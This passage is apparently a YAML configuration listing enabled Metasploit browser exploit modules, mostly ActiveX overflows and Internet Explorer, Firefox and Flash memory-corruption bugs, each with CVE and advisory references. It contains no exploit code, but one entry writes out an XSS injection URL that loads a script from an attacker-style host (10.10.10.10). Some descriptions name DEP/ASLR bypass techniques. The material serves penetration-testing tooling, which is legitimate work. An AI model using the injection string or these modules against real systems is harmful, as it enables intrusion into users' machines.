\t\t\t\tNOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.\n\
\t\t\t"
authors:
- - CVE
- 2010-0806
- - OSVDB
- "62810"
- - BID
- "38615"
- - URL
- http://www.microsoft.com/technet/security/advisory/981374.mspx
- - URL
- http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/
- - URL
- http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html
- - MSB
- MS10-018
path: extensions/metasploit/
class: Msf_module
msf_nis2004_get:
enable: true
msf: true
msf_key: windows/browser/nis2004_get
name: Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n\
\t\t\t\tControl (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n\
\t\t\t\tBy sending an overly long string to the \"Get()\" method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1689
- - OSVDB
- "36164"
- - URL
- http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html
path: extensions/metasploit/
class: Msf_module
msf_ibmlotusdomino_dwa_uploadmodule:
enable: true
msf: true
msf_key: windows/browser/ibmlotusdomino_dwa_uploadmodule
name: IBM Lotus Domino Web Access Upload Module Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module.\n\
\t\t\t\tBy sending an overly long string to the \"General_ServerName()\" property located\n\
\t\t\t\tin the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4474
- - OSVDB
- "40954"
- - BID
- "26972"
- - URL
- http://milw0rm.com/exploits/4820
path: extensions/metasploit/
class: Msf_module
msf_hp_loadrunner_addfolder:
enable: true
msf: true
msf_key: windows/browser/hp_loadrunner_addfolder
name: HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Persits Software Inc's\n\
\t\t\t\tXUpload ActiveX control (version 2.1.0.1) that is included in HP LoadRunner 9.0.\n\
\t\t\t\tBy passing an overly long string to the AddFolder method, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6530
- - OSVDB
- "39901"
- - BID
- "27025"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059296.html
path: extensions/metasploit/
class: Msf_module
msf_ea_checkrequirements:
enable: true
msf: true
msf_key: windows/browser/ea_checkrequirements
name: Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Electronic Arts SnoopyCtrl\n\
\t\t\t\tActiveX Control (NPSnpy.dll 1.1.0.36). When sending an overly long\n\
\t\t\t\tstring to the CheckRequirements() method, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4466
- - OSVDB
- "37723"
path: extensions/metasploit/
class: Msf_module
msf_ms06_057_webview_setslice:
enable: true
msf: true
msf_key: windows/browser/ms06_057_webview_setslice
name: Internet Explorer WebViewFolderIcon setSlice() Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the WebViewFolderIcon ActiveX control\n\
\t\t\tincluded with Windows 2000, Windows XP, and Windows 2003. This flaw was published\n\
\t\t\tduring the Month of Browser Bugs project (MoBB #18).\n\
\t\t\t"
authors:
- - CVE
- 2006-3730
- - OSVDB
- "27110"
- - MSB
- MS06-057
- - BID
- "19030"
- - URL
- http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html
path: extensions/metasploit/
class: Msf_module
msf_sonicwall_addrouteentry:
enable: true
msf: true
msf_key: windows/browser/sonicwall_addrouteentry
name: SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n\
\t\t\t\tBy sending an overly long string to the \"AddRouteEntry()\" method located\n\
\t\t\t\tin the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5603
- - OSVDB
- "39069"
- - URL
- http://www.sec-consult.com/303.html
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_extsetowner:
enable: true
msf: true
msf_key: windows/browser/trendmicro_extsetowner
name: Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a remote code execution vulnerability in Trend Micro\n\
\t\t\t\tInternet Security Pro 2010 ActiveX.\n\
\t\t\t\tWhen sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-3189
- - OSVDB
- "67561"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-165/
- - URL
- http://www.exploit-db.com/exploits/14878/
path: extensions/metasploit/
class: Msf_module
msf_mcafee_mcsubmgr_vsprintf:
enable: true
msf: true
msf_key: windows/browser/mcafee_mcsubmgr_vsprintf
name: McAfee Subscription Manager Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n\
\t\t\t\tDue to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n\
\t\t\t\tpassing a large string to one of the COM-exposed routines, such as IsAppExpired.\n\
\t\t\t\tThis vulnerability was discovered by Karl Lynn of eEye.\n\
\t\t\t"
authors:
- - CVE
- 2006-3961
- - OSVDB
- "27698"
- - BID
- "19265"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html
path: extensions/metasploit/
class: Msf_module
msf_ms09_043_owc_htmlurl:
enable: true
msf: true
msf_key: windows/browser/ms09_043_owc_htmlurl
name: Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Microsoft's Office Web Components.\n\
\t\t\t\tWhen passing an overly long string as the \"HTMLURL\" parameter an attacker can\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1534
- - OSVDB
- "56916"
- - BID
- "35992"
- - MSB
- MS09-043
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819
path: extensions/metasploit/
class: Msf_module
msf_communicrypt_mail_activex:
enable: true
msf: true
msf_key: windows/browser/communicrypt_mail_activex
name: CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the ANSMTP.dll/AOSMTP.dll\n\
\t\t\t\tActiveX Control provided by CommuniCrypt Mail 1.16. By sending an overly\n\
\t\t\t\tlong string to the \"AddAttachments()\" method, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "64839"
- - URL
- http://www.exploit-db.com/exploits/12663
path: extensions/metasploit/
class: Msf_module
msf_gom_openurl:
enable: true
msf: true
msf_key: windows/browser/gom_openurl
name: GOM Player ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in GOM Player 2.1.6.3499.\n\
\t\t\t\tBy sending an overly long string to the \"OpenUrl()\" method located\n\
\t\t\t\tin the GomWeb3.dll Control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5779
- - OSVDB
- "38282"
- - URL
- http://secunia.com/advisories/27418/
path: extensions/metasploit/
class: Msf_module
msf_facebook_extractiptc:
enable: true
msf: true
msf_key: windows/browser/facebook_extractiptc
name: Facebook Photo Uploader 4 ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Facebook Photo Uploader 4.\n\
\t\t\t\tBy sending an overly long string to the \"ExtractIptc()\" property located\n\
\t\t\t\tin the ImageUploader4.ocx (4.5.57.0) Control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-5711
- - OSVDB
- "41073"
- - BID
- "27534"
- - URL
- http://milw0rm.com/exploits/5049
path: extensions/metasploit/
class: Msf_module
msf_ask_shortformat:
enable: true
msf: true
msf_key: windows/browser/ask_shortformat
name: Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.\n\
\t\t\t\tAn attacker may be able to execute arbitrary code by sending an overly\n\
\t\t\t\tlong string to the \"ShortFormat()\" method in askbar.dll.\n\
\t\t\t"
authors:
- - CVE
- 2007-5107
- - OSVDB
- "37735"
- - URL
- http://wslabi.com/wabisabilabi/showBidInfo.do?code=ZD-00000148
path: extensions/metasploit/
class: Msf_module
msf_ibmegath_getxmlvalue:
enable: true
msf: true
msf_key: windows/browser/ibmegath_getxmlvalue
name: IBM Access Support ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IBM Access Support. When\n\
\t\t\t\tsending an overly long string to the GetXMLValue() method of IbmEgath.dll\n\
\t\t\t\t(3.20.284.0) an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0215
- - OSVDB
- "52958"
- - BID
- "34228"
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_smil_debug:
enable: true
msf: true
msf_key: windows/browser/apple_quicktime_smil_debug
name: Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Apple QuickTime\n\
\t\t\t\t7.6.6. When processing a malformed SMIL URI, a stack-based buffer\n\
\t\t\t\toverflow can occur when logging an error message.\n\
\t\t\t"
authors:
- - CVE
- 2010-1799
- - OSVDB
- "66636"
- - BID
- "41962"
- - URL
- http://secunia.com/advisories/40729/
- - URL
- http://support.apple.com/kb/HT4290
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_executerequest_dbg:
enable: true
msf: true
msf_key: windows/browser/novelliprint_executerequest_dbg
name: Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n\
\t\t\t\tWhen sending an overly long string to the 'debug' parameter in ExecuteRequest()\n\
\t\t\t\tproperty of ienipp.ocx an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-3106
- - OSVDB
- "66960"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-10-06
- - URL
- http://www.exploit-db.com/exploits/15001/
path: extensions/metasploit/
class: Msf_module
msf_enjoysapgui_comp_download:
enable: true
msf: true
msf_key: windows/browser/enjoysapgui_comp_download
name: EnjoySAP SAP GUI ActiveX Control Arbitrary File Download
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a user's file system\n\
\t\t\t\tby abusing the \"Comp_Download\" method in the SAP KWEdit ActiveX Control (kwedit.dll 6400.1.1.41).\n\
\t\t\t"
authors:
- - CVE
- 2008-4830
- - OSVDB
- "53680"
- - URL
- http://dsecrg.com/files/pub/pdf/HITB%20-%20Attacking%20SAP%20Users%20with%20Sapsploit.pdf
path: extensions/metasploit/
class: Msf_module
msf_ms08_078_xml_corruption:
enable: true
msf: true
msf_key: windows/browser/ms08_078_xml_corruption
name: Internet Explorer Data Binding Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability in the data binding feature of Internet\n\
\t\t\tExplorer. In order to execute code reliably, this module uses the .NET DLL\n\
\t\t\tmemory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n\
\t\t\tused to create a fake vtable at a known location with all methods pointing\n\
\t\t\tto our payload. Since the .text segment of the .NET DLL is non-writable, a\n\
\t\t\tprefixed code stub is used to copy the payload into a new memory segment and\n\
\t\t\tcontinue execution from there.\n\
\t\t\t"
authors:
- - CVE
- 2008-4844
- - OSVDB
- "50622"
- - BID
- "32721"
- - MSB
- MS08-078
- - URL
- http://www.microsoft.com/technet/security/advisory/961051.mspx
- - URL
- http://taossa.com/archive/bh08sotirovdowd.pdf
path: extensions/metasploit/
class: Msf_module
msf_ms10_018_ie_tabular_activex:
enable: true
msf: true
msf_key: windows/browser/ms10_018_ie_tabular_activex
name: Internet Explorer Tabular Data Control ActiveX Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption vulnerability in the Internet Explorer\n\
\t\t\t\tTabular Data ActiveX Control. Microsoft reports that versions 5.01 and 6 of Internet\n\
\t\t\t\tExplorer are vulnerable.\n\n\
\t\t\t\tBy specifying a long value as the \"DataURL\" parameter to this control, it is possible\n\
\t\t\t\tto write a NUL byte outside the bounds of an array. By targeting control flow data\n\
\t\t\t\ton the stack, an attacker can execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-0805
- - OSVDB
- "63329"
- - BID
- "39025"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-034
- - MSB
- MS10-018
path: extensions/metasploit/
class: Msf_module
msf_adobe_flashplayer_newfunction:
enable: true
msf: true
msf_key: windows/fileformat/adobe_flashplayer_newfunction
name: Adobe Flash Player "newfunction" Invalid Pointer Use
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the DoABC tag handling within\n\
\t\t\t\tversions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n\
\t\t\t\tvulnerable, as are any other applications that may embed Flash player.\n\n\
\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\n\
\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\n\
\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\n\n\
\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\n\
\t\t\t\tadobe_libtiff module. This method is unlikely to work across various\n\
\t\t\t\tWindows versions due to the hardcoded syscall number.\n\
\t\t\t"
authors:
- - CVE
- 2010-1297
- - OSVDB
- "65141"
- - BID
- "40586"
- - URL
- http://www.adobe.com/support/security/advisories/apsa10-01.html
- - URL
- http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/
path: extensions/metasploit/
class: Msf_module
msf_verypdf_pdfview:
enable: true
msf: true
msf_key: windows/browser/verypdf_pdfview
name: VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n\
\t\t\t\tbecause it fails to properly bounds-check user-supplied data before copying\n\
\t\t\t\tit into an insufficiently sized memory buffer. An attacker can exploit this issue\n\
\t\t\t\tto execute arbitrary code within the context of the affected application.\n\
\t\t\t"
authors:
- - CVE
- 2008-5492
- - OSVDB
- "49871"
- - BID
- "32313"
path: extensions/metasploit/
class: Msf_module
msf_symantec_appstream_unsafe:
enable: true
msf: true
msf_key: windows/browser/symantec_appstream_unsafe
name: Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n\
\t\t\t\tis in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n\
\t\t\t\tmethod. The insecure method can be exploited to download and execute arbitrary files in the\n\
\t\t\t\tcontext of the currently logged-on user.\n\
\t\t\t"
authors:
- - CVE
- 2008-4388
- - OSVDB
- "51410"
path: extensions/metasploit/
class: Msf_module
msf_realplayer_import:
enable: true
msf: true
msf_key: windows/browser/realplayer_import
name: RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n\
\t\t\t\tRealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n\
\t\t\t\tmethod, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5601
- - OSVDB
- "41430"
- - BID
- "26130"
path: extensions/metasploit/
class: Msf_module
msf_ms03_020_ie_objecttype:
enable: true
msf: true
msf_key: windows/browser/ms03_020_ie_objecttype
name: MS03-020 Internet Explorer Object Type
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Internet Explorer's\n\
\t\t\t\thandling of the OBJECT type attribute.\n\
\t\t\t"
authors:
- - CVE
- 2003-0344
- - OSVDB
- "2967"
- - BID
- "7806"
- - MSB
- MS03-020
path: extensions/metasploit/
class: Msf_module
msf_ms10_042_helpctr_xss_cmd_exec:
enable: true
msf: true
msf_key: windows/browser/ms10_042_helpctr_xss_cmd_exec
name: Microsoft Help Center XSS and Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tHelp and Support Center is the default application provided to access online\n\
\t\t\t\tdocumentation for Microsoft Windows. Microsoft supports accessing help documents\n\
\t\t\t\tdirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to\n\
\t\t\t\tan error in validation of input to hcp:// combined with a local cross site\n\
\t\t\t\tscripting vulnerability and a specialized mechanism to launch the XSS trigger,\n\
\t\t\t\tarbitrary command execution can be achieved.\n\n\
\t\t\t\tOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it\n\
\t\t\t\tcan be used to launch the exploit automatically. If IE8 and WMP11, either can\n\
\t\t\t\tbe used to launch the attack, but both pop dialog boxes asking the user if\n\
\t\t\t\texecution should continue. This exploit detects if non-intrusive mechanisms are\n\
\t\t\t\tavailable and will use one if possible. In the case of both IE8 and WMP11, the\n\
\t\t\t\texploit defaults to using an iframe on IE8, but is configurable by setting the\n\
\t\t\t\tDIALOGMECH option to \"none\" or \"player\".\n\
\t\t\t"
authors:
- - CVE
- 2010-1885
- - OSVDB
- "65264"
- - URL
- http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY
- - URL
- http://www.microsoft.com/technet/security/advisory/2219475.mspx
- - MSB
- MS10-042
path: extensions/metasploit/
class: Msf_module
msf_ultraoffice_httpupload:
enable: true
msf: true
msf_key: windows/browser/ultraoffice_httpupload
name: Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Ultra Shareware's Office\n\
\t\t\t\tControl. When processing the 'HttpUpload' method, the arguments are concatenated\n\
\t\t\t\ttogether to form a command line to run a bundled version of cURL. If the command\n\
\t\t\t\tfails to run, a stack-based buffer overflow occurs when building the error\n\
\t\t\t\tmessage. This is due to the use of sprintf() without proper bounds checking.\n\n\
\t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n\
\t\t\t\tinto memory unmodified.\n\
\t\t\t"
authors:
- - CVE
- 2008-3878
- - OSVDB
- "47866"
- - BID
- "30861"
- - URL
- http://www.exploit-db.com/exploits/6318
path: extensions/metasploit/
class: Msf_module
msf_awingsoft_winds3d_sceneurl:
enable: true
msf: true
msf_key: windows/browser/awingsoft_winds3d_sceneurl
name: AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an untrusted program execution vulnerability within the\n\
\t\t\t\tWinds3D Player from AwingSoft. The Winds3D Player is a browser plugin for\n\
\t\t\t\tIE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'\n\
\t\t\t\tparameter to the URL to an executable, an attacker can execute arbitrary\n\
\t\t\t\tcode.\n\n\
\t\t\t\tTesting was conducted using plugin version 3.5.0.9 for Firefox 3.5 and\n\
\t\t\t\tIE 8 on Windows XP SP3.\n\
\t\t\t"
authors:
- - CVE
- 2009-4850
- - OSVDB
- "60049"
path: extensions/metasploit/
class: Msf_module
msf_hyleos_chemviewx_activex:
enable: true
msf: true
msf_key: windows/browser/hyleos_chemviewx_activex
name: Hyleos ChemView ActiveX Control Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos\n\
\t\t\t\tChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods\n\
\t\t\t\twith an overly long first argument, an attacker can overrun a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-0679
- - OSVDB
- "62276"
- - URL
- http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf
- - URL
- http://www.exploit-db.com/exploits/11422/
path: extensions/metasploit/
class: Msf_module
msf_wmi_admintools:
enable: true
msf: true
msf_key: windows/browser/wmi_admintools
name: Microsoft WMI Administration Tools ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory trust issue in the Microsoft WMI\n\
\t\t\t\tAdministration tools ActiveX control. When processing a specially crafted\n\
\t\t\t\tHTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n\
\t\t\t\tthe 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n\
\t\t\t\tas a trusted pointer. It makes an indirect call via this pointer which leads\n\
\t\t\t\tto arbitrary code execution.\n\n\
\t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\
\t\t\t\t.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n\
\t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\
\t\t\t\tversions.\n\n\
\t\t\t\tThe WMI Administrative Tools are a standalone download & install (linked in the\n\
\t\t\t\treferences).\n\n\
\t\t\t"
authors:
- - OSVDB
- "69942"
- - CVE
- 2010-3973
- - BID
- "45546"
- - URL
- http://wooyun.org/bug.php?action=view&id=1006
- - URL
- http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf
- - URL
- http://secunia.com/advisories/42693
- - URL
- http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314
path: extensions/metasploit/
class: Msf_module
msf_realplayer_console:
enable: true
msf: true
msf_key: windows/browser/realplayer_console
name: RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n\
\t\t\t\tBy sending a specially crafted string to the 'Console' property\n\
\t\t\t\tin the rmoc3260.dll control, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-1309
- - OSVDB
- "42946"
- - BID
- "28157"
- - URL
- http://secunia.com/advisories/29315/
path: extensions/metasploit/
class: Msf_module
msf_mozilla_nstreerange:
enable: true
msf: true
msf_key: windows/browser/mozilla_nstreerange
name: Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a code execution vulnerability in Mozilla Firefox\n\
\t\t\t\t3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection.\n\
\t\t\t\tBy overwriting a subfunction of invalidateSelection it is possible to free the \n\
\t\t\t\tnsTreeRange object that the function currently operates on. \n\
\t\t\t\tAny further operations on the freed object can result in remote code execution.\n\
\t\t\t\tUtilizing the call setup the function provides it's possible to bypass DEP\n\
\t\t\t\twithout the need for a ROP. Sadly this exploit is still either dependent\n\
\t\t\t\ton Java or bound by ASLR because Firefox doesn't employ any ASLR-free\n\
\t\t\t\tmodules anymore.\n\
\t\t\t"
authors:
- - CVE
- 2011-0073
- - OSVDB
- "72087"
- - BID
- "47663"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-157/
- - URL
- https://bugzilla.mozilla.org/show_bug.cgi?id=630919
- - URL
- http://www.mozilla.org/security/announce/2011/mfsa2011-13.html
path: extensions/metasploit/
class: Msf_module
msf_ms09_072_style_object:
enable: true
msf: true
msf_key: windows/browser/ms09_072_style_object
name: Internet Explorer Style getElementsByTagName Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a vulnerability in the getElementsByTagName function\n\
\t\t\tas implemented within Internet Explorer.\n\
\t\t\t"
authors:
- - MSB
- MS09-072
- - CVE
- 2009-3672
- - OSVDB
- "50622"
- - BID
- "37085"
- - URL
- http://www.microsoft.com/technet/security/advisory/977981.mspx
- - URL
- http://taossa.com/archive/bh08sotirovdowd.pdf
path: extensions/metasploit/
class: Msf_module
msf_ms08_053_mediaencoder:
enable: true
msf: true
msf_key: windows/browser/ms08_053_mediaencoder
name: Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Windows Media Encoder 9. When\n\
\t\t\t\tsending an overly long string to the GetDetailsString() method of wmex.dll\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-3008
- - OSVDB
- "47962"
- - BID
- "31065"
- - MSB
- MS08-053
path: extensions/metasploit/
class: Msf_module
msf_greendam_url:
enable: true
msf: true
msf_key: windows/browser/greendam_url
name: Green Dam URL Processing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in Green Dam Youth Escort\n\
\t\t\t\tversion 3.17 in the way it handles overly long URLs.\n\
\t\t\t\tBy setting an overly long URL, an attacker can overrun a buffer and execute\n\
\t\t\t\tarbitrary code. This module uses the .NET DLL memory technique by Alexander\n\
\t\t\t\tSotirov and Mark Dowd and should bypass DEP, NX and ASLR.\n\
\t\t\t"
authors:
- - OSVDB
- "55126"
- - URL
- http://www.cse.umich.edu/~jhalderm/pub/gd/
- - URL
- http://www.milw0rm.com/exploits/8938
- - URL
- http://taossa.com/archive/bh08sotirovdowd.pdf
path: extensions/metasploit/
class: Msf_module
msf_ie_unsafe_scripting:
enable: true
msf: true
msf_key: windows/browser/ie_unsafe_scripting
name: Internet Explorer Unsafe Scripting Misconfiguration
category: Metasploit
description: "\n\
\t\t\t\tThis exploit takes advantage of the \"Initialize and script ActiveX controls not\n\
\t\t\tmarked safe for scripting\" setting within Internet Explorer. When this option is set,\n\
\t\t\tIE allows access to the WScript.Shell ActiveX control, which allows javascript to\n\
\t\t\tinteract with the file system and run commands. This security flaw is not uncommon\n\
\t\t\tin corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to\n\
\t\t\tsave binary data to the file system, ADODB.Stream access is required, which in IE7\n\
\t\t\twill trigger a cross domain access violation. As such, we write the code to a .vbs\n\
\t\t\tfile and execute it from there, where no such restrictions exist.\n\n\
\t\t\t\tWhen set via domain policy, the most common registry entry to modify is HKLM\\\n\
\t\t\tSoftware\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1201,\n\
\t\t\twhich if set to '0' forces ActiveX controls not marked safe for scripting to be\n\
\t\t\tenabled for the Intranet zone.\n\n\
\t\t\t\tThis module creates a javascript/html hybrid that will render correctly either\n\
\t\t\tvia a direct GET http://msf-server/ or as a javascript include, such as in:\n\
\t\t\thttp://intranet-server/xss.asp?id=\"><script%20src=http://10.10.10.10/ie_unsafe_script.js>\n\
\t\t\t</script>.\n\
\t\t\t"
authors:
- - URL
- http://support.microsoft.com/kb/182569
- - URL
- http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html
path: extensions/metasploit/
class: Msf_module
msf_ms09_043_owc_msdso:
enable: true
msf: true
msf_key: windows/browser/ms09_043_owc_msdso
name: Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a memory corruption vulnerability within versions 10 and 11 of\n\
\t\t\t\tthe Office Web Component Spreadsheet ActiveX control. This module was based on\n\
\t\t\t\tan exploit found in the wild.\n\
\t\t\t"
authors:
- - CVE
- 2009-1136
- - OSVDB
- "55806"
- - MSB
- MS09-043
- - URL
- http://ahmed.obied.net/software/code/exploits/ie_owc.py
- - URL
- http://www.exploit-db.com/exploits/9163/
- - URL
- http://www.microsoft.com/technet/security/advisory/973472.mspx
path: extensions/metasploit/
class: Msf_module
msf_ms11_003_ie_css_import:
enable: true
msf: true
msf_key: windows/browser/ms11_003_ie_css_import
name: Internet Explorer CSS Recursive Import Use After Free
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory corruption vulnerability within Microsoft's\n\
\t\t\t\tHTML engine (mshtml). When parsing an HTML page containing a recursive CSS\n\
\t\t\t\timport, a C++ object is deleted and later reused. This leads to arbitrary\n\
\t\t\t\tcode execution.\n\n\
\t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\
\t\t\t\t.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n\
\t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\
\t\t\t\tversions with .NET 2.0.50727 installed.\n\
\t\t\t"
authors:
- - CVE
- 2010-3971
- - OSVDB
- "69796"
- - BID
- "45246"
- - URL
- http://www.microsoft.com/technet/security/advisory/2488013.mspx
- - URL
- http://www.wooyun.org/bugs/wooyun-2010-0885
- - URL
- http://seclists.org/fulldisclosure/2010/Dec/110
- - URL
- http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf
- - URL
- http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
- - MSB
- MS11-003
path: extensions/metasploit/
class: Msf_module
